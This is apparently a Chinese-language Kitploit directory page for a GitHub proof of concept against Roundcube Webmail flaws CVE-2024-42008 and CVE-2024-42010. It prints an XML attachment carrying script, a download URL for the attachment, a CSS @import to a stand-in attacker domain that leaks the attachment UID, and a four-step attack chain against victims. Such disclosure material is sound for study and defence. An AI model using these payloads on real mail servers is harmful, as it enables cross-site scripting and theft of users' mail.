Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/victoni/roundcube-cve-2024-42008-and-cve-2024-42010-poc
漏洞分析漏洞利用Web应用程序漏洞利用Web安全电子邮件安全
GitHubvictoni/roundcube-cve-2024-42008-and-cve-2024-42010-poc

Roundcube-CVE-2024-42008-and-CVE-2024-42010-POC

Roundcube 漏洞 CVE-2024-42008 和 CVE-2024-42010 的 POC

查看仓库
241年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

概念验证:CVE-2024-42008 和 CVE-2024-42010

此概念验证(PoC)演示了 Roundcube Webmail 中两个漏洞的利用,这些漏洞可实现 CSS 注入和跨站脚本(XSS)。攻击分两个阶段:

  1. 通过恶意 XML 附件进行 XSS(CVE-2024-42008)

    由于文件上载检查不足,可以发送包含 JavaScript 代码的 XML 文件作为附件,例如:

    root@kitploit:~
    <something:script xmlns:something="<http://www.w3.org/1999/xhtml">
    	alert(origin)
    </something:script>
    

    这是一个已知问题,被追踪为 CVE-2020-13965,缓解措施是禁用“打开附件”选项。但文件仍然可以通过端点访问:

    root@kitploit:~
    https://roundcube.host.com/?_task=mail&_mbox=INBOX&_uid=[UID]&_part=2&_download=0&_action=get
    

    其中 UID 是该特定邮箱(即 INBOX)中该特定附件的唯一标识符。

  2. 通过 CSS 注入进行 HTML 外带(CVE-2024-42010)

    发送邮件时,可以注入自己的 CSS 文件,前提是托管在以 a 开头的域名上。通过这一点,结合一个处理易受攻击的 Roundcube 主机发出的请求的 JavaScript 服务器文件,可以提取恶意 XSS 附件的 UID。

    在发送的邮件中使用以下方式导入 CSS:

    root@kitploit:~
    <style>
    	@import "//a.attackerdomain.com/start?"
    </style>
    

    托管 JS 服务器(roundcube-css-exploit.js),用于外带恶意附件的 UID。

攻击链

  1. 在您的域名上托管 JavaScript 服务器
  2. 发送一封包含恶意 XML 附件的邮件,并从您的域名导入 CSS
  3. 受害者打开邮件,UID 被外带
  4. 然后,根据 XSS 传递的首选方式,您可以发送带有附件链接的第二封电子邮件,或者通过该链接重定向用户。

来源:政府电子邮件面临风险:Roundcube Webmail 中的关键跨站脚本漏洞(Sonar 漏洞研究团队)

下载工具